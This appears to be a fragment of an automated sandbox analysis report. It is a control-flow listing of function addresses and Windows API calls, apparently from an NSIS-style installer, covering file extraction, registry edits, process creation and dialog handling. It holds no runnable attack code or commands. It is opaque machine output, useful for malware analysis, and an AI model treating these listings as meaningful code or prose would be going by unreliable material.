2878->2877 2880 403621 CloseHandle 2878->2880 3025 405f87 2878->3025 3042 405d44 MoveFileExA 2878->3042 3047 405604 CreateProcessA 2878->3047 2880->2878 2882 4062b1 wsprintfA LoadLibraryExA 2881->2882 2882->2795 2885 406323 GetProcAddress 2884->2885 2886 406319 2884->2886 2889 403264 2885->2889 2887 40628f 3 API calls 2886->2887 2888 40631f 2887->2888 2888->2885 2888->2889 2889->2799 2890->2805 2891->2807 2893 40592e 2892->2893 2894 403300 CharNextA 2893->2894 2895 405934 CharNextA 2893->2895 2894->2816 2895->2893 3053 4061cf 2896->3053 2898 4031d6 2898->2814 2899 4031cc 2899->2898 3062 4058fd lstrlenA CharPrevA 2899->3062 2902 4055cf 2 API calls 2903 4031e4 2902->2903 3065 405b2d 2903->3065 3069 405afe GetFileAttributesA CreateFileA 2906->3069 2908 402d88 2929 402d98 2908->2929 3070 405f65 lstrcpynA 2908->3070 2910 402dae 3071 405944 lstrlenA 2910->3071 2914 402dbf GetFileSize 2915 402ebb 2914->2915 2927 402dd6 2914->2927 3076 402ce4 2915->3076 2917 402ec4 2919 402ef4 GlobalAlloc 2917->2919 2917->2929 3111 4031a9 SetFilePointer 2917->3111 3087 4031a9 SetFilePointer 2919->3087 2921 402f27 2925 402ce4 6 API calls 2921->2925 2923 402edd 2926 403193 ReadFile 2923->2926 2924 402f0f 3088 402f81 2924->3088 2925->2929 2930 402ee8 2926->2930 2927->2915 2927->2921 2927->2929 2931 402ce4 6 API calls 2927->2931 3108 403193 2927->3108 2929->2822 2930->2919 2930->2929 2931->2927 2932 402f1b 2932->2929 2932->2932 2933 402f58 SetFilePointer 2932->2933 2933->2929 2935 4062fd 5 API calls 2934->2935 2936 4037c9 2935->2936 2937 4037e1 2936->2937 2938 4037cf GetUserDefaultUILanguage 2936->2938 3141 405e4c 2937->3141 3132 405ec3 wsprintfA 2938->3132 2941 4037df 3133 403a7a 2941->3133 2943 40382a lstrcatA 2943->2941 2944 405e4c 3 API calls 2944->2943 2947 4059eb 18 API calls 2948 40385c 2947->2948 2949 4038e5 2948->2949 2951 405e4c 3 API calls 2948->2951 2950 4059eb 18 API calls 2949->2950 2952 4038eb 2950->2952 2953 403888 2951->2953 2954 4038fb LoadImageA 2952->2954 2955 405f87 17 API calls 2952->2955 2953->2949 2958 4038a4 lstrlenA 2953->2958 2961 405928 CharNextA 2953->2961 2956 4039a1 2954->2956 2957 403922 RegisterClassA 2954->2957 2955->2954 2960 40140b 2 API calls 2956->2960 2959 403958 SystemParametersInfoA CreateWindowExA 2957->2959 2962 403509 2957->2962 2963 4038b2 lstrcmpiA 2958->2963 2964 4038d8 2958->2964 2959->2956 2965 4039a7 2960->2965 2967 4038a2 2961->2967 2962->2824 2963->2964 2968 4038c2 GetFileAttributesA 2963->2968 2966 4058fd 3 API calls 2964->2966 2965->2962 2969 403a7a 18 API calls 2965->2969 2970 4038de 2966->2970 2967->2958 2971 4038ce 2968->2971 2972 4039b8 2969->2972 3146 405f65 lstrcpynA 2970->3146 2971->2964 2974 405944 2 API calls 2971->2974 2975 4039c4 ShowWindow 2972->2975 2976 403a47 2972->2976 2974->2964 2978 40628f 3 API calls 2975->2978 3147 40515e OleInitialize 2976->3147 2980 4039dc 2978->2980 2979 403a4d 2981 403a51 2979->2981 2982 403a69 2979->2982 2983 4039ea GetClassInfoA 2980->2983 2985 40628f 3 API calls 2980->2985 2981->2962 2988 40140b 2 API calls 2981->2988 2984 40140b 2 API calls 2982->2984 2986 403a14 DialogBoxParamA 2983->2986 2987 4039fe GetClassInfoA RegisterClassA 2983->2987 2984->2962 2985->2983 2989 40140b 2 API calls 2986->2989 2987->2986 2988->2962 2990 403a3c 2989->2990 2990->2962 2991->2812 3169 405f65 lstrcpynA 2992->3169 2994 4059fc 3170 405996 CharNextA CharNextA 2994->3170 2997 4034df 2997->2824 3006 405f65 lstrcpynA 2997->3006 2998 4061cf 5 API calls 3004 405a12 2998->3004 2999 405a3d lstrlenA 3000 405a48 2999->3000 2999->3004 3001 4058fd 3 API calls 3000->3001 3003 405a4d GetFileAttributesA 3001->3003 3003->2997 3004->2997 3004->2999 3005 405944 2 API calls 3004->3005 3176 406268 FindFirstFileA 3004->3176 3005->2999 3006->2857 3007->2863 3009 405696 3008->3009 3010 403531 ExitProcess 3009->3010 3011 4056aa MessageBoxIndirectA 3009->3011 3011->3010 3013 4062fd 5 API calls 3012->3013 3014 40353e lstrcatA 3013->3014 3014->2853 3014->2854 3016 4055a3 GetLastError 3015->3016 3017 403580 3015->3017 3016->3017 3018 4055b2 SetFileSecurityA 3016->3018 3017->2865 3018->3017 3019 4055c8 GetLastError 3018->3019 3019->3017 3021 4055e3 GetLastError 3020->3021 3022 4055df 3020->3022 3021->3022 3022->2865 3023->2866 3024->2878 3026 405f94 3025->3026 3027 4061b6 3026->3027 3030 406190 lstrlenA 3026->3030 3032 405f87 10 API calls 3026->3032 3034 405e4c 3 API calls 3026->3034 3035 4060ac GetSystemDirectoryA 3026->3035 3036 4060bf GetWindowsDirectoryA 3026->3036 3037 4061cf 5 API calls 3026->3037 3038 405f87 10 API calls 3026->3038 3039 406139 lstrcatA 3026->3039 3040 4060f3 SHGetSpecialFolderLocation 3026->3040 3179 405ec3 wsprintfA 3026->3179 3180 405f65 lstrcpynA 3026->3180 3028 4035e0 DeleteFileA 3027->3028 3181 405f65 lstrcpynA 3027->3181 3028->2872 3028->2878 3030->3026 3032->3030 3034->3026 3035->3026 3036->3026 3037->3026 3038->3026 3039->3026 3040->3026 3041 40610b SHGetPathFromIDListA CoTaskMemFree 3040->3041 3041->3026 3043 405d67 3042->3043 3044 405d58 3042->3044 3043->2878 3182 405bd4 3044->3182 3048 405643 3047->3048 3049 405637 CloseHandle 3047->3049 3048->2878 3049->3048 3051 401389 2 API calls 3050->3051 3052 401420 3051->3052 3052->2834 3060 4061db 3053->3060 3054 406243 3055 406247 CharPrevA 3054->3055 3057 406262 3054->3057 3055->3054 3056 406238 CharNextA 3056->3054 3056->3060 3057->2899 3058 405928 CharNextA 3058->3060 3059 406226 CharNextA 3059->3060 3060->3054 3060->3056 3060->3058 3060->3059 3061 406233 CharNextA 3060->3061 3061->3056 3063 4031de 3062->3063 3064 405917 lstrcatA 3062->3064 3063->2902 3064->3063 3066 405b38 GetTickCount GetTempFileNameA 3065->3066 3067 405b65 3066->3067 3068 4031ef 3066->3068 3067->3066 3067->3068 3068->2814 3069->2908 3070->2910 3072 405951 3071->3072 3073 402db4 3072->3073 3074 405956 CharPrevA 3072->3074 3075 405f65 lstrcpynA 3073->3075 3074->3072 3074->3073 3075->2914 3077 402d05 3076->3077 3078 402ced 3076->3078 3079 402d15 GetTickCount 3077->3079 3080 402d0d 3077->3080 3081 402cf6 DestroyWindow 3078->3081 3082 402cfd 3078->3082 3084 402d23 CreateDialogParamA ShowWindow 3079->3084 3085 402d46 3079->3085 3112 406339 3080->3112 3081->3082 3082->2917 3084->3085 3085->2917 3087->2924 3090 402f97 3088->3090 3089 402fc5 3092 403193 ReadFile 3089->3092 3090->3089 3118 4031a9 SetFilePointer 3090->3118 3093 402fd0 3092->3093 3094 402fe2 GetTickCount 3093->3094 3095 40312c 3093->3095 3096 403116 3093->3096 3094->3096 3104 403031 3094->3104 3097 40316e 3095->3097 3100 403130 3095->3100 3096->2932 3099 403193 ReadFile 3097->3099 3098 403193 ReadFile 3098->3104 3099->3096 3100->3096 3101 403193 ReadFile 3100->3101 3102 405ba5 WriteFile 3100->3102 3101->3100 3102->3100 3103 403087 GetTickCount 3103->3104 3104->3096 3104->3098 3104->3103 3105 4030ac MulDiv wsprintfA 3104->3105 3116 405ba5 WriteFile 3104->3116 3119 40508c 3105->3119 3130 405b76 ReadFile 3108->3130 3111->2923 3113 406356 PeekMessageA 3112->3113 3114 402d13 3113->3114 3115 40634c DispatchMessageA 3113->3115 3114->2917 3115->3113 3117 405bc3 3116->3117 3117->3104 3118->3089 3120 4050a7 3119->3120 3129 40514a 3119->3129 3121 4050c4 lstrlenA 3120->3121 3122 405f87 17 API calls 3120->3122 3123 4050d2 lstrlenA 3121->3123 3124 4050ed 3121->3124 3122->3121 3125 4050e4 lstrcatA 3123->3125 3123->3129 3126 405100 3124->3126 3127 4050f3 SetWindowTextA 3124->3127 3125->3124 3128 405106 SendMessageA SendMessageA SendMessageA 3126->3128 3126->3129 3127->3126 3128->3129 3129->3104 3131 4031a6 3130->3131 3131->2927 3132->2941 3134 403a8e 3133->3134 3154 405ec3 wsprintfA 3134->3154 3136 403aff 3155 403b33 3136->3155 3138 40383a 3138->2947 3139 403b04 3139->3138 3140 405f87 17 API calls 3139->3140 3140->3139 3158 405deb 3141->3158 3144 405e80 RegQueryValueExA RegCloseKey 3145 40380c 3144->3145 3145->2943 3145->2944 3146->2949 3162 404072 3147->3162 3149 404072 SendMessageA 3151 4051ba OleUninitialize 3149->3151 3150 405181 3152 4051a8 3150->3152 3165 401389 3150->3165 3151->2979 3152->3149 3154->3136 3156 405f87 17 API calls 3155->3156 3157 403b41 SetWindowTextA 3156->3157 3157->3139 3159 405dfa 3158->3159 3160 405e03 RegOpenKeyExA 3159->3160 3161 405dfe 3159->3161 3160->3161 3161->3144 3161->3145 3163 40408a 3162->3163 3164 40407b SendMessageA 3162->3164 3163->3150 3164->3163 3167 401390 3165->3167 3166 4013fe 3166->3150 3167->3166 3168 4013cb MulDiv SendMessageA 3167->3168 3168->3167 3169->2994 3171 4059b1 3170->3171 3174 4059c1 3170->3174 3172 4059bc CharNextA 3171->3172 3171->3174 3175 4059e1 3172->3175 3173 405928 CharNextA 3173->3174 3174->3173 3174->3175 3175->2997 3175->2998 3177 40627e FindClose 3176->3177 3178 406289 3176->3178 3177->3178 3178->3004 3179->3026 3180->3026 3181->3028 3183 405c20 GetShortPathNameA 3182->3183 3184 405bfa 3182->3184 3186 405c35 3183->3186 3187 405d3f 3183->3187 3209 405afe GetFileAttributesA CreateFileA 3184->3209 3186->3187 3188 405c3d wsprintfA 3186->3188 3187->3043 3190 405f87 17 API calls 3188->3190 3189 405c04 CloseHandle GetShortPathNameA 3189->3187 3191 405c18 3189->3191 3192 405c65 3190->3192 3191->3183 3191->3187 3210 405afe GetFileAttributesA CreateFileA 3192->3210 3194 405c72 3194->3187 3195 405c81 GetFileSize GlobalAlloc 3194->3195 3196 405ca3 3195->3196 3197 405d38 CloseHandle 3195->3197 3198 405b76 ReadFile 3196->3198 3197->3187 3199 405cab 3198->3199 3199->3197 3211 405a63 lstrlenA 3199->3211 3202 405cc2 lstrcpyA 3205 405ce4 3202->3205 3203 405cd6 3204 405a63 4 API calls 3203->3204 3204->3205 3206 405d1b SetFilePointer 3205->3206 3207 405ba5 WriteFile 3206->3207 3208 405d31 GlobalFree 3207->3208 3208->3197 3209->3189 3210->3194 3212 405aa4 lstrlenA 3211->3212 3213 405a7d lstrcmpiA 3212->3213 3214 405aac 3212->3214 3213->3214 3215 405a9b CharNextA 3213->3215 3214->3202 3214->3203 3215->3212 3800 406372 WaitForSingleObject 3801 40638c 3800->3801 3802 40639e GetExitCodeProcess 3801->3802 3803 406339 2 API calls 3801->3803 3804 406393 WaitForSingleObject 3803->3804 3804->3801 3805 403773 3806 40377e 3805->3806 3807 403785 GlobalAlloc 3806->3807 3808 403782 3806->3808 3807->3808 3809 4014f4 SetForegroundWindow 3810 402951 3809->3810 3811 401cf5 3812 402a9f 17 API calls 3811->3812 3813 401cfc 3812->3813 3814 402a9f 17 API calls 3813->3814 3815 401d08 GetDlgItem 3814->3815 3816 402577 3815->3816 3817 4022f6 3818 402304 3817->3818 3819 4022fe 3817->3819 3821 402314 3818->3821 3822 402ac1 17 API calls 3818->3822 3820 402ac1 17 API calls 3819->3820 3820->3818 3823 402ac1 17 API calls 3821->3823 3826 402322 3821->3826 3822->3821 3823->3826 3824 402ac1 17 API calls 3825 40232b WritePrivateProfileStringA 3824->3825 3826->3824 3827 4026f8 3828 402ac1 17 API calls 3827->3828 3829 4026ff FindFirstFileA 3828->3829 3830 402722 3829->3830 3834 402712 3829->3834 3831 402729 3830->3831 3835 405ec3 wsprintfA 3830->3835 3836 405f65 lstrcpynA 3831->3836 3835->3831 3836->3834 3837 40237b 3838 402382 3837->3838 3839 4023ad 3837->3839 3840 402b01 17 API calls 3838->3840 3841 402ac1 17 API calls 3839->3841 3843 402389 3840->3843 3842 4023b4 3841->3842 3848 402b7f 3842->3848 3845 4023c1 3843->3845 3846 402ac1 17 API calls 3843->3846 3847 40239a RegDeleteValueA RegCloseKey 3846->3847 3847->3845 3849 402b95 3848->3849 3851 402bab 3849->3851 3852 402bb4 3849->3852 3851->3845 3853 405deb RegOpenKeyExA 3852->3853 3854 402be2 3853->3854 3855 402c08 RegEnumKeyA 3854->3855 3856 402c1f RegCloseKey 3854->3856 3857 402c40 RegCloseKey 3854->3857 3859 402bb4 6 API calls 3854->3859 3861 402c33 3854->3861 3855->3854 3855->3856 3858 4062fd 5 API calls 3856->3858 3857->3861 3860 402c2f 3858->3860 3859->3854 3860->3861 3862 402c4e RegDeleteKeyA 3860->3862 3861->3851 3862->3861 3363 401ffd 3364 4020bd 3363->3364 3365 40200f 3363->3365 3367 401423 24 API calls 3364->3367 3366 402ac1 17 API calls 3365->3366 3368 402016 3366->3368 3374 40223c 3367->3374 3369 402ac1 17 API calls 3368->3369 3370 40201f 3369->3370 3371 402034 LoadLibraryExA 3370->3371 3372 402027 GetModuleHandleA 3370->3372 3371->3364 3373 402044 GetProcAddress 3371->3373 3372->3371 3372->3373 3375 402090 3373->3375 3376 402053 3373->3376 3377 40508c 24 API calls 3375->3377 3378 401423 24 API calls 3376->3378 3379 402063 3376->3379 3377->3379 3378->3379 3379->3374 3380 4020b1 FreeLibrary 3379->3380 3380->3374 3863 40257d 3864 402582 3863->3864 3865 402596 3863->3865 3866 402a9f 17 API calls 3864->3866 3867 402ac1 17 API calls 3865->3867 3869 40258b 3866->3869 3868 40259d lstrlenA 3867->3868 3868->3869 3870 4025bf 3869->3870 3871 405ba5 WriteFile 3869->3871 3871->3870 3872 4018fd 3873 401934 3872->3873 3874 402ac1 17 API calls 3873->3874 3875 401939 3874->3875 3876 40572d 67 API calls 3875->3876 3877 401942 3876->3877 3878 401000 3879 401037 BeginPaint GetClientRect 3878->3879 3880 40100c DefWindowProcA 3878->3880 3882 4010f3 3879->3882 3885 401179 3880->3885 3883 401073 CreateBrushIndirect FillRect DeleteObject 3882->3883 3884 4010fc 3882->3884 3883->3882 3886 401102 CreateFontIndirectA 3884->3886 3887 401167 EndPaint 3884->3887 3886->3887 3888 401112 6 API calls 3886->3888 3887->3885 3888->3887 3889 405000 3890 405010 3889->3890 3891 405024 3889->3891 3892 405016 3890->3892 3893 40506d 3890->3893 3894 40502c IsWindowVisible 3891->3894 3900 405043 3891->3900 3896 404072 SendMessageA 3892->3896 3895 405072 CallWindowProcA 3893->3895 3894->3893 3897 405039 3894->3897 3898 405020 3895->3898 3896->3898 3902 404957 SendMessageA 3897->3902 3900->3895 3907 4049d7 3900->3907 3903 4049b6 SendMessageA 3902->3903 3904 40497a GetMessagePos ScreenToClient SendMessageA 3902->3904 3906 4049ae 3903->3906 3905 4049b3 3904->3905 3904->3906 3905->3903 3906->3900 3916 405f65 lstrcpynA 3907->3916 3909 4049ea 3917 405ec3 wsprintfA 3909->3917 3911 4049f4 3912 40140b 2 API calls 3911->3912 3913 4049fd 3912->3913 3918 405f65 lstrcpynA 3913->3918 3915 404a04 3915->3893 3916->3909 3917->3911 3918->3915 3919 401900 3920 402ac1 17 API calls 3919->3920 3921 401907 3920->3921 3922 405681 MessageBoxIndirectA 3921->3922 3923 401910 3922->3923 3924 401502 3925 40150a 3924->3925 3927 40151d 3924->3927 3926 402a9f 17 API calls 3925->3926 3926->3927 3928 402682 3929 402689 3928->3929 3930 4028fe 3928->3930 3931 402a9f 17 API calls 3929->3931 3932 402690 3931->3932 3933 40269f SetFilePointer 3932->3933 3933->3930 3934 4026af 3933->3934 3936 405ec3 wsprintfA 3934->3936 3936->3930 3937 401c04 3938 402a9f 17 API calls 3937->3938 3939 401c0b 3938->3939 3940 402a9f 17 API calls 3939->3940 3941 401c18 3940->3941 3942 401c2d 3941->3942 3943 402ac1 17 API calls 3941->3943 3944 402ac1 17 API calls 3942->3944 3948 401c3d 3942->3948 3943->3942 3944->3948 3945 401c94 3947 402ac1 17 API calls 3945->3947 3946 401c48 3949 402a9f 17 API calls 3946->3949 3950 401c99 3947->3950 3948->3945 3948->3946 3951 401c4d 3949->3951 3953 402ac1 17 API calls 3950->3953 3952 402a9f 17 API calls 3951->3952 3954 401c59 3952->3954 3955 401ca2 FindWindowExA 3953->3955 3956 401c84 SendMessageA 3954->3956 3957 401c66 SendMessageTimeoutA 3954->3957 3958 401cc0 3955->3958 3956->3958 3957->3958 3325 401389 3327 401390 3325->3327 3326 4013fe 3327->3326 3328 4013cb MulDiv SendMessageA 3327->3328 3328->3327 3959 404a09 GetDlgItem GetDlgItem 3960 404a5b 7 API calls 3959->3960 3974 404c73 3959->3974 3961 404af1 SendMessageA 3960->3961 3962 404afe DeleteObject 3960->3962 3961->3962 3963 404b07 3962->3963 3965 404b3e 3963->3965 3967 405f87 17 API calls 3963->3967 3964 404d57 3966 404e03 3964->3966 3970 404c66 3964->3970 3976 404db0 SendMessageA 3964->3976 3968 404026 18 API calls 3965->3968 3971 404e15 3966->3971 3972 404e0d SendMessageA 3966->3972 3973 404b20 SendMessageA SendMessageA 3967->3973 3969 404b52 3968->3969 3975 404026 18 API calls 3969->3975 3977 40408d 8 API calls 3970->3977 3983 404e27 ImageList_Destroy 3971->3983 3984 404e2e 3971->3984 3988 404e3e 3971->3988 3972->3971 3973->3963 3974->3964 3979 404957 5 API calls 3974->3979 3991 404ce4 3974->3991 3992 404b60 3975->3992 3976->3970 3981 404dc5 SendMessageA 3976->3981 3982 404ff9 3977->3982 3978 404d49 SendMessageA 3978->3964 3979->3991 3980 404fad 3980->3970 3989 404fbf ShowWindow GetDlgItem ShowWindow 3980->3989 3987 404dd8 3981->3987 3983->3984 3985 404e37 GlobalFree 3984->3985 3984->3988 3985->3988 3986 404c34 GetWindowLongA SetWindowLongA 3990 404c4d 3986->3990 3997 404de9 SendMessageA 3987->3997 3988->3980 4003 4049d7 4 API calls 3988->4003 4004 404e79 3988->4004 3989->3970 3993 404c53 ShowWindow 3990->3993 3994 404c6b 3990->3994 3991->3964 3991->3978 3992->3986 3996 404baf SendMessageA 3992->3996 3998 404c2e 3992->3998 4001 404beb SendMessageA 3992->4001 4002 404bfc SendMessageA 3992->4002 4010 40405b SendMessageA 3993->4010 4011 40405b SendMessageA 3994->4011 3996->3992 3997->3966 3998->3986 3998->3990 3999 404ebd 4005 404f83 InvalidateRect 3999->4005 4009 404f31 SendMessageA SendMessageA 3999->4009 4001->3992 4002->3992 4003->4004 4004->3999 4006 404ea7 SendMessageA 4004->4006 4005->3980 4007 404f99 4005->4007 4006->3999 4012 404912 4007->4012 4009->3999 4010->3970 4011->3974 4015 40484d 4012->4015 4014 404927 4014->3980 4016 404863 4015->4016 4017 405f87 17 API calls 4016->4017 4018 4048c7 4017->4018 4019 405f87 17 API calls 4018->4019 4020 4048d2 4019->4020 4021 405f87 17 API calls 4020->4021 4022 4048e8 lstrlenA wsprintfA SetDlgItemTextA 4021->4022 4022->4014 4023 401490 4024 40508c 24 API calls 4023->4024 4025 401497 4024->4025 4026 401d95 GetDC 4027 402a9f 17 API calls 4026->4027 4028 401da7 GetDeviceCaps MulDiv ReleaseDC 4027->4028 4029 402a9f 17 API calls 4028->4029 4030 401dd8 4029->4030 4031 405f87 17 API calls 4030->4031 4032 401e15 CreateFontIndirectA 4031->4032 4033 402577 4032->4033 4034 404496 4035 4044c2 4034->4035 4036 4044d3 4034->4036 4095 405665 GetDlgItemTextA 4035->4095 4038 4044df GetDlgItem 4036->4038 4043 40453e 4036->4043 4040 4044f3 4038->4040 4039 4044cd 4042 4061cf 5 API calls 4039->4042 4045 404507 SetWindowTextA 4040->4045 4051 405996 4 API calls 4040->4051 4041 404622 4046 4047cc 4041->4046 4097 405665 GetDlgItemTextA 4041->4097 4042->4036 4043->4041 4043->4046 4047 405f87 17 API calls 4043->4047 4049 404026 18 API calls 4045->4049 4050 40408d 8 API calls 4046->4050 4052 4045b2 SHBrowseForFolderA 4047->4052 4048 404652 4053 4059eb 18 API calls 4048->4053 4054 404523 4049->4054 4055 4047e0 4050->4055 4056 4044fd 4051->4056 4052->4041 4057 4045ca CoTaskMemFree 4052->4057 4058 404658 4053->4058 4059 404026 18 API calls 4054->4059 4056->4045 4062 4058fd 3 API calls 4056->4062 4060 4058fd 3 API calls 4057->4060 4098 405f65 lstrcpynA 4058->4098 4061 404531 4059->4061 4063 4045d7 4060->4063 4096 40405b SendMessageA 4061->4096 4062->4045 4066 40460e SetDlgItemTextA 4063->4066 4071 405f87 17 API calls 4063->4071 4066->4041 4067 404537 4069 4062fd 5 API calls 4067->4069 4068 40466f 4070 4062fd 5 API calls 4068->4070 4069->4043 4078 404676 4070->4078 4072 4045f6 lstrcmpiA 4071->4072 4072->4066 4075 404607 lstrcatA 4072->4075 4073 4046b2 4099 405f65 lstrcpynA 4073->4099 4075->4066 4076 4046b9 4077 405996 4 API calls 4076->4077 4079 4046bf GetDiskFreeSpaceA 4077->4079 4078->4073 4081 405944 2 API calls 4078->4081 4083 40470a 4078->4083 4082 4046e3 MulDiv 4079->4082 4079->4083 4081->4078 4082->4083 4084 40477b 4083->4084 4085 404912 20 API calls 4083->4085 4086 40479e 4084->4086 4088 40140b 2 API calls 4084->4088 4087 404768 4085->4087 4100 404048 EnableWindow 4086->4100 4090 40477d SetDlgItemTextA 4087->4090 4091 40476d 4087->4091 4088->4086 4090->4084 4093 40484d 20 API calls 4091->4093 4092 4047ba 4092->4046 4094 4043ef SendMessageA 4092->4094 4093->4084 4094->4046 4095->4039 4096->4067 4097->4048 4098->4068 4099->4076 4100->4092 4101 401d1a 4102 402a9f 17 API calls 4101->4102 4103 401d28 SetWindowLongA 4102->4103 4104 402951 4103->4104 4110 40149d 4111 4022e1 4110->4111 4112 4014ab PostQuitMessage 4110->4112 4112->4111 4113 40159d 4114 402ac1 17 API calls 4113->4114 4115 4015a4 SetFileAttributesA 4114->4115 4116 4015b6 4115->4116 4117 401a1e 4118 402ac1 17 API calls 4117->4118 4119 401a27 ExpandEnvironmentStringsA 4118->4119 4120 401a3b 4119->4120 4122 401a4e 4119->4122 4121 401a40 lstrcmpA 4120->4121 4120->4122 4121->4122 4123 40171f 4124 402ac1 17 API calls 4123->4124 4125 401726 SearchPathA 4124->4125 4126 401741 4125->4126 4127 401e25 4128 402a9f 17 API calls 4127->4128 4129 401e2b 4128->4129 4130 402a9f 17 API calls 4129->4130 4131 401e37 4130->4131 4132 401e43 ShowWindow 4131->4132 4133 401e4e EnableWindow 4131->4133 4134 402951 4132->4134 4133->4134 4135 401f2b 4136 402ac1 17 API calls 4135->4136 4137 401f32 4136->4137 4138 406268 2 API calls 4137->4138 4139 401f38 4138->4139 4141 401f4a 4139->4141 4142 405ec3 wsprintfA 4139->4142 4142->4141 4143 40292c SendMessageA 4144 402951 4143->4144 4145 402946 InvalidateRect 4143->4145 4145->4144 3216 401932 3217 401934 3216->3217 3222 402ac1 3217->3222 3223 402acd 3222->3223 3224 405f87 17 API calls 3223->3224 3225 402aee 3224->3225 3226 401939 3225->3226 3227 4061cf 5 API calls 3225->3227 3228 40572d 3226->3228 3227->3226 3229 4059eb 18 API calls 3228->3229 3230 40574d 3229->3230 3231 405755 DeleteFileA 3230->3231 3232 40576c 3230->3232 3261 401942 3231->3261 3233 40589a 3232->3233 3265 405f65 lstrcpynA 3232->3265 3238 406268 2 API calls 3233->3238 3233->3261 3235 405792 3236 4057a5 3235->3236 3237 405798 lstrcatA 3235->3237 3240 405944 2 API calls 3236->3240 3239 4057ab 3237->3239 3241 4058be 3238->3241 3242 4057b9 lstrcatA 3239->3242 3243 4057c4 lstrlenA FindFirstFileA 3239->3243 3240->3239 3244 4058fd 3 API calls 3241->3244 3241->3261 3242->3243 3243->3233 3252 4057e8 3243->3252 3245 4058c8 3244->3245 3247 4056e5 5 API calls 3245->3247 3246 405928 CharNextA 3246->3252 3248 4058d4 3247->3248 3249 4058d8 3248->3249 3250 4058ee 3248->3250 3256 40508c 24 API calls 3249->3256 3249->3261 3251 40508c 24 API calls 3250->3251 3251->3261 3252->3246 3253 405879 FindNextFileA 3252->3253 3260 40572d 60 API calls 3252->3260 3262 40508c 24 API calls 3252->3262 3263 40508c 24 API calls 3252->3263 3264 405d44 36 API calls 3252->3264 3266 405f65 lstrcpynA 3252->3266 3267 4056e5 3252->3267 3253->3252 3255 405891 FindClose 3253->3255 3255->3233 3257 4058e5 3256->3257 3258 405d44 36 API calls 3257->3258 3258->3261 3260->3252 3262->3253 3263->3252 3264->3252 3265->3235 3266->3252 3275 405ad9 GetFileAttributesA 3267->3275 3270 405700 RemoveDirectoryA 3272 40570e 3270->3272 3271 405708 DeleteFileA 3271->3272 3273 405712 3272->3273 3274 40571e SetFileAttributesA 3272->3274 3273->3252 3274->3273 3276 4056f1 3275->3276 3277 405aeb SetFileAttributesA 3275->3277 3276->3270 3276->3271 3276->3273 3277->3276 4146 4026b4 4147 4026ba 4146->4147 4148 402951 4147->4148 4149 4026c2 FindClose 4147->4149 4149->4148 4150 402736 4151 402ac1 17 API calls 4150->4151 4152 402744 4151->4152 4153 40275a 4152->4153 4154 402ac1 17 API calls 4152->4154 4155 405ad9 2 API calls 4153->4155 4154->4153 4156 402760 4155->4156 4178 405afe GetFileAttributesA CreateFileA 4156->4178 4158 40276d 4159 402816 4158->4159 4160 402779 GlobalAlloc 4158->4160 4163 402831 4159->4163 4164 40281e DeleteFileA 4159->4164 4161 402792 4160->4161 4162 40280d CloseHandle 4160->4162 4179 4031a9 SetFilePointer 4161->4179 4162->4159 4164->4163 4166 402798 4167 403193 ReadFile 4166->4167 4168 4027a1 GlobalAlloc 4167->4168 4169 4027b1 4168->4169 4170 4027eb 4168->4170 4172 402f81 31 API calls 4169->4172 4171 405ba5 WriteFile 4170->4171 4173 4027f7 GlobalFree 4171->4173 4177 4027be 4172->4177 4174 402f81 31 API calls 4173->4174 4176 40280a 4174->4176 4175 4027e2 GlobalFree 4175->4170 4176->4162 4177->4175 4178->4158 4179->4166 4180 402837 4181 402a9f 17 API calls 4180->4181 4182 40283d 4181->4182 4183 402865 4182->4183 4184 40287c 4182->4184 4189 402716 4182->4189 4185 402879 4183->4185 4186 40286a 4183->4186 4187 402896 4184->4187 4188 402886 4184->4188 4195 405ec3 wsprintfA 4185->4195 4194 405f65 lstrcpynA 4186->4194 4191 405f87 17 API calls 4187->4191 4190 402a9f 17 API calls 4188->4190 4190->4189 4191->4189 4194->4189 4195->4189 4196 4014b7 4197 4014bd 4196->4197 4198 401389 2 API calls 4197->4198 4199 4014c5 4198->4199 4200 401b39 4201 402ac1 17 API calls 4200->4201 4202 401b40 4201->4202 4203 402a9f 17 API calls 4202->4203 4204 401b49 wsprintfA 4203->4204 4205 402951 4204->4205 4206 40413a lstrcpynA lstrlenA 4207 40233a 4208 402ac1 17 API calls 4207->4208 4209 40234b 4208->4209 4210 402ac1 17 API calls 4209->4210 4211 402354 4210->4211 4212 402ac1 17 API calls 4211->4212 4213 40235e GetPrivateProfileStringA 4212->4213 3340 4015bb 3341 402ac1 17 API calls 3340->3341 3342 4015c2 3341->3342 3343 405996 4 API calls 3342->3343 3357 4015ca 3343->3357 3344 401624 3346 401652 3344->3346 3347 401629 3344->3347 3345 405928 CharNextA 3345->3357 3349 401423 24 API calls 3346->3349 3359 401423 3347->3359 3355 40164a 3349->3355 3351 4055cf 2 API calls 3351->3357 3353 4055ec 5 API calls 3353->3357 3354 40163b SetCurrentDirectoryA 3354->3355 3356 40160c GetFileAttributesA 3356->3357 3357->3344 3357->3345 3357->3351 3357->3353 3357->3356 3358 405552 4 API calls 3357->3358 3358->3357 3360 40508c 24 API calls 3359->3360 3361 401431 3360->3361 3362 405f65 lstrcpynA 3361->3362 3362->3354 4214 401d3b GetDlgItem GetClientRect 4215 402ac1 17 API calls 4214->4215 4216 401d6b LoadImageA SendMessageA 4215->4216 4217 402951 4216->4217 4218 401d89 DeleteObject 4216->4218 4218->4217 4219 4016bb 4220 402ac1 17 API calls 4219->4220 4221 4016c1 GetFullPathNameA 4220->4221 4222 4016d8 4221->4222 4228 4016f9 4221->4228 4224 406268 2 API calls 4222->4224 4222->4228 4223 40170d GetShortPathNameA 4225 402951 4223->4225 4226 4016e9 4224->4226 4226->4228 4229 405f65 lstrcpynA 4226->4229 4228->4223 4228->4225 4229->4228

              Executed Functions

              Function 004031F1 Relevance: 91.4, APIs: 34, Strings: 18, Instructions: 368stringcomfileCOMMON
              Download Yara Rule

              Control-flow Graph

              • Executed
              • Not Executed
